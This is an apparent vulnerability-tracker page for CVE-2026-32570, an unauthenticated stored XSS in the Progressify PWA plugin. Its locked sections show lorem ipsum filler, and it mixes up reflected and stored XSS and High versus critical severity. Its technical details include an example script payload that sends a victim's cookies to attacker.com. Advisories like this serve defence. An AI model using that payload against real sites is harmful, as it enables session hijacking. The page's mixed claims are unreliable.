Sceawere

Vulnerability Detail

CVE-2026-32570UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV

Progressify Unauthenticated Stored XSS

Vulnerability Metadata

Severity
High
Score / CVSS
7.1
Creation Date
16h ago
Vendor
DaftPlug
Product
Progressify - Progressive Web App (PWA)
Attack Type
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Complexity
LOW

Narrative and Response

Description

Unauthenticated Cross Site Scripting (XSS) in Progressify - Progressive Web App (PWA) <= 1.6.0 versions.

Executive Summary

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Executive Summary Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Technical Details

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Detailed Technical Analysis Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Mitigations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Remediation & Mitigations Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

References

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Intelligence References Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Additional Metadata

{
  "score": "7.1",
  "pubDate": "2026-10-06T09:17:42.550Z",
  "pubdate": "2026-10-06T09:17:42.550Z",
  "executiveSummary": "This vulnerability is an Unauthenticated Cross-Site Scripting (XSS) flaw identified in the Progressify - Progressive Web App (PWA) plugin for versions 1.6.0 and below.\nThe vulnerability resides in the application's failure to properly sanitize user-supplied input before reflecting it back to the end-user's browser. An unauthenticated remote attacker can exploit this weakness by injecting malicious JavaScript payloads into vulnerable parameters within the plugin.\nSuccessful exploitation allows for the execution of arbitrary scripts in the context of the victim's session. Potential impacts include the theft of sensitive session cookies, unauthorized modification of the web page content, redirection of users to malicious external sites, and the execution of actions on behalf of authenticated administrators.\nThe risk is considered critical for sites relying on Progressify, as no authentication is required to trigger the injection, facilitating automated attacks against unsuspecting site visitors or privileged administrative users.",
  "technicalDetails": "The root cause of this vulnerability is improper neutralization of input during the rendering process within the Progressify plugin. The application fails to implement adequate output encoding or context-aware sanitization when processing user-controlled data that is subsequently rendered in the DOM.\nThe vulnerability manifests as a Stored XSS, where the injected malicious payload is permanently stored by the server, such as within a database or a configuration file. When a victim—which may be a standard site visitor or an administrative user—navigates to a page containing the injected payload, the browser interprets the malicious script as legitimate application code and executes it within the security context of the origin.\nExploitation is straightforward and does not require elevated privileges or active session tokens. An attacker identifies an input vector associated with the Progressify settings or generated PWA manifest data that does not undergo sanitization. The attacker crafts a request containing a crafted HTML/JavaScript payload, such as '<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>'.\nOnce the payload is submitted and stored, the attack flow is as follows: 1) The attacker injects the script into the vulnerable parameter; 2) The server accepts and persists this data; 3) A victim visits the affected page; 4) The server reflects the payload in the HTTP response; 5) The browser executes the script automatically.\nThe affected component is the logic responsible for outputting PWA configuration data or plugin settings. Because the vulnerability involves the execution of code in the victim's browser, the attacker can leverage the victim's authentication status to perform unauthorized administrative actions, effectively bypassing access controls implemented by the host application. This cross-site scripting vector significantly undermines the integrity and confidentiality of the affected PWA environment, allowing for session hijacking, credential harvesting, and persistent site defacement."
}
CVE-2026-32570: Progressify Unauthenticated Stored XSS (HIGH Severity, CVSS: 7.1) | Sceawere